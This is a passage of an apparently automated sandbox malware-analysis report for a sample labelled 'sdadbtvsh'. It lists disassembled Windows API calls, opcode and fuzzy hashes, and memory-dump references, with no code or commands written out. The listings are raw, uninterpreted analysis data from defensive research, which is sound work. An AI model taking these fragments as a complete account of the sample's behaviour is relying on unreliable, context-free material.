                                                                                              • Instruction Fuzzy Hash: 4401ACB564010F67EF14FB60D959EFF7FA9BF55340F140015B60263282DA949E08C671
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 005F2558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 8cb8da549140de3d12bedf12c2c1eb81d33b6869d60cdd2d6c3b518d30d090cd
                                                                                              • Instruction ID: f21054ac6027d12df186d60763f90f2e9ec5c20a555e42eba74cd482ba0e1ebe
                                                                                              • Opcode Fuzzy Hash: 8cb8da549140de3d12bedf12c2c1eb81d33b6869d60cdd2d6c3b518d30d090cd
                                                                                              • Instruction Fuzzy Hash: 0801A7B564010E67EF14E764DA16AFF7FA9BB51740F140015BA0167282DA689F09CA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 005F2663
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 92852d7c4f10057a81554d2f1cc2836da5188db6dd9925c2c29c849144a5522e
                                                                                              • Instruction ID: 0e43aca72b754323e7d5174d6f502cd017e8cd8d8aa221ce390e6ab2039e357e
                                                                                              • Opcode Fuzzy Hash: 92852d7c4f10057a81554d2f1cc2836da5188db6dd9925c2c29c849144a5522e
                                                                                              • Instruction Fuzzy Hash: 6AF0D1B1A4021AA6EF14F7A49C56FFF7F69BB40710F040A19BA22A32C2DFA459088650
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00664018,0066405C), ref: 00628B1E
                                                                                              • CloseHandle.KERNEL32 ref: 00628B30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: \@f
                                                                                              • API String ID: 3712363035-3461318062
                                                                                              • Opcode ID: e4bf46d2048119e1238d9e896b53ab19e844e0ead6c430f2dd5cb3b9eb840e6e
                                                                                              • Instruction ID: d3aed87e42cec27e95e5059d5d91c2010ae66ac0e3071c7b1357f15e45ddd057
                                                                                              • Opcode Fuzzy Hash: e4bf46d2048119e1238d9e896b53ab19e844e0ead6c430f2dd5cb3b9eb840e6e
                                                                                              • Instruction Fuzzy Hash: EBF05EB2940325BBE3206FA0AC4AFB73E5EEB15795F001020FB08D6192DAB55C4096F8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005AFAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005B1102,?,?,?,0059100A), ref: 005AFAE7
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0059100A), ref: 005B1106
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0059100A), ref: 005B1115
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005B1110
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 55579361-631824599
                                                                                              • Opcode ID: 7938af2d4c5ef17f7b160fc9effc4173fc6394acd72d3808cbc84f9054f777f7
                                                                                              • Instruction ID: 974366e9157ecdfabfa0ff04e88e2d4cf8c0a720a65d27ef44266cc89da5e831
                                                                                              • Opcode Fuzzy Hash: 7938af2d4c5ef17f7b160fc9effc4173fc6394acd72d3808cbc84f9054f777f7
                                                                                              • Instruction Fuzzy Hash: 15E06D70600B118BD3709F28E828386BFF5BB04700F408D1CE946C6291EBB5E448CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 005AF102
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: 05f$85f
                                                                                              • API String ID: 1385522511-1946346565
                                                                                              • Opcode ID: cbd1fa08e07b047175c1883fe49df0c68466bfebac75ed9263313d5e104f4b1d
                                                                                              • Instruction ID: fdb27b5d76bf33063620372e1f1f2759bbd61feef27240b33abb8677e70264e2
                                                                                              • Opcode Fuzzy Hash: cbd1fa08e07b047175c1883fe49df0c68466bfebac75ed9263313d5e104f4b1d
                                                                                              • Instruction Fuzzy Hash: 3EE0DF31010AB1DBE614DB58F84999C3B52FB4A320B10027AE003876D2EB642E418B14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: %.3d$X64
                                                                                              • API String ID: 481472006-1077770165
                                                                                              • Opcode ID: 429c6bbff2628cc32c7a090248f64edf97dddbbb76eb00c40c68c01fa6165e28
                                                                                              • Instruction ID: d810957b5c7ebc9f5c344fc92b999ab085b6ab56d3736d222185604a342daae3
                                                                                              • Opcode Fuzzy Hash: 429c6bbff2628cc32c7a090248f64edf97dddbbb76eb00c40c68c01fa6165e28
                                                                                              • Instruction Fuzzy Hash: F7D012B1C15159D9CF949BD1ED4A8BD7B7CB71C301F104C53F946A1000E63495099721
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00622CCB
                                                                                              • PostMessageW.USER32(00000000), ref: 00622CD2
                                                                                                • Part of subcall function 005FF1A7: Sleep.KERNEL32 ref: 005FF21F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: fc2806c83a8776c455b28fdc5f02fd336e37a6105c2dbecf5decbdd7c88272be
                                                                                              • Instruction ID: e78b478e0c00aab52b311d92d360cbe865c4f8c70f5878284b771fd452cd50cb
                                                                                              • Opcode Fuzzy Hash: fc2806c83a8776c455b28fdc5f02fd336e37a6105c2dbecf5decbdd7c88272be
                                                                                              • Instruction Fuzzy Hash: 1AD022313C03007BF338B730EC0FFCA2A02AB84B00F0008117305AA0C0C9F46801C758
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00622C8B
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00622C9E
                                                                                                • Part of subcall function 005FF1A7: Sleep.KERNEL32 ref: 005FF21F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 0f22a4bf9f3dd51e33d5553d19451d8ae604c468812723dc6b2d6d66e81b87e9
                                                                                              • Instruction ID: a8a839cd467c9901de07a13b3a69349fce8a287604c656be59a2c9af7f870afe
                                                                                              • Opcode Fuzzy Hash: 0f22a4bf9f3dd51e33d5553d19451d8ae604c468812723dc6b2d6d66e81b87e9
                                                                                              • Instruction Fuzzy Hash: ECD0C935384750A6E678B770EC0FFDA6A56AB94B11F0108157749AA1D0C9E46805C654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 005CC233
                                                                                              • GetLastError.KERNEL32 ref: 005CC241
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005CC29C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: f295c986647386bedc4e7d5ffccefe4b32da22444ac41e5338470d66c3e210ee
                                                                                              • Instruction ID: 584ee062c36bc2ad3a64ab2c1cab7a03e804e020a6aa8d01a54aa83836bd3f2b
                                                                                              • Opcode Fuzzy Hash: f295c986647386bedc4e7d5ffccefe4b32da22444ac41e5338470d66c3e210ee
                                                                                              • Instruction Fuzzy Hash: 7841B539600256AFDB218FE9C844FAA7FA5FF45720F2441ADE89DAB1A1DB309D41C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%